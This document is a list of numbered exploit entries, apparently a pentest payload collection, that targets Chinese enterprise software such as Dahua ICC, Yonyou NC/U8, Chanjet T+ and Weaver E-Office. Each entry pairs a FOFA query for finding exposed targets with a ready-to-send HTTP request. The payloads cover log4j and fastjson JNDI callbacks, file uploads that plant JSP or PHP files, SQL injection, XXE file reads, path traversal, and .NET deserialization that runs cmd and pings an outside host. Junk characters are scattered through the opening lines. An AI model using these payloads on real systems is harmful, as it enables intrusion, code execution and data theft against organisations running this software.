1 r: k6 J; N4 o3 P# z$ W- ZUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 s# M# o% A2 Y1 HConnection: close# i7 j( V# n6 c% X1 [) S) [
Accept: */*+ W- {3 _9 k3 I' |: [
Accept-Language: en' c' p/ ^2 I+ k" U
Accept-Encoding: gzip& a8 o0 u( I. a* Y( e
: U( I5 I8 Y/ A3 k1 \/ [ \/ B
4 r0 O5 O/ Z9 M9 S* p6 O5 u$ u21. 大华ICC智能物联综合管理平台random远程代码执行
& l+ \' C9 ?6 [; i/ g5 s/ b* SFOFA:icon_hash="-1935899595"
2 [) z# J# Z7 U- h6 z. xPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* H9 `- u% v- t+ f0 E6 L2 O0 iHost: x.x.x.x" K2 Q; A, D+ `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" G' t% n' f7 ZContent-Length: 161& _: h T' S/ O: e# x& h0 c
Accept-Encoding: gzip7 |3 {( ?2 e' ~* ?
Connection: close
5 x" W# Z3 w( p( h2 ?1 |Content-Type: application/json;charset=utf-8' n# q- z5 D9 _4 ]6 L
1 D4 o! V! P2 f! H* u3 P) R{
6 y9 f R7 i& |8 Q8 k6 \"a":{
1 M8 ]: l( X# a- q, i W# K "@type":"com.alibaba.fastjson.JSONObject",
! l r4 Q" C% U' T/ @ { {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}/ q) H* z; B" h; {
}""
- [) k$ c0 \7 w0 G: d}
4 [. D# [9 x, @/ C5 R% w- n( P4 e ^( }0 i7 l% ?
6 z5 g9 H: h& }0 K- m' W6 S22. 大华ICC智能物联综合管理平台 log4j远程代码执行
/ }8 D3 z5 ? D7 z oFOFA:icon_hash="-1935899595"
, X6 c" E7 h, L# v- W) ~0 TPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
9 B1 s! U" P# \& H4 M1 p1 y5 g) tHost: your-ip
) K$ t2 E) M d( S% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 D; L7 f: k) g$ a5 k
Content-Type: application/json;charset=utf-8" [! w- |2 J& }
- [6 `- N: ^2 t( R" Y
{
6 e1 l" u; P: x+ C6 J"loginName":"${jndi:ldap://dnslog}" Q! z- `4 e+ }$ D9 |% F# p/ G
}
" s1 N: A6 R7 c" \: O: L
/ P- s ?% H0 p* l) F; c4 N! E5 p$ p! v
8 f% r7 e& Y: x2 k$ u
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 Z0 @! y( x% h( Q2 s
FOFA:icon_hash="-1935899595"
6 d( L5 b3 m. b) u. j4 O+ @POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 L5 I; ^3 U& w
Host: your-ip G% n6 \, n0 I9 F, w3 i) ~, G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 Q: c" p7 E7 z! X6 AContent-Type: application/json;charset=utf-8( q% D+ O$ o% h/ I+ B- L9 o# J
Accept-Encoding: gzip
2 r- w! y) h- S* ~Connection: close% L7 `, ^8 I& F- F0 k
: U, |8 J& |; @8 Z
{$ T. p6 L. v" U7 {2 z% y
"a":{
# L$ b: `) g( `" q% Y2 E k/ B# Y3 O "@type":"com.alibaba.fastjson.JSONObject",( o4 K9 u: l" Z( Y) Q6 x
{"@type":"java.net.URL","val":"http://DNSLOG"}, U$ {! d6 i) H& z( {4 x
}""
! ~' w# Y* g2 b$ c$ @1 ^4 r}
5 ]; Z' S' H5 M- q, B- v
4 \ b, P# E/ ^6 x3 t8 E/ }' E0 c$ Y# ~+ g# t. v( L6 P
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
 <soapenv:Header/>
 <soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
 </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
 "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "StartInfo":{
 "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "FileName":"cmd",
 "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
 }
 }
 }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
 "storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
 "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "StartInfo": {
 "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
 }
 }
 }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
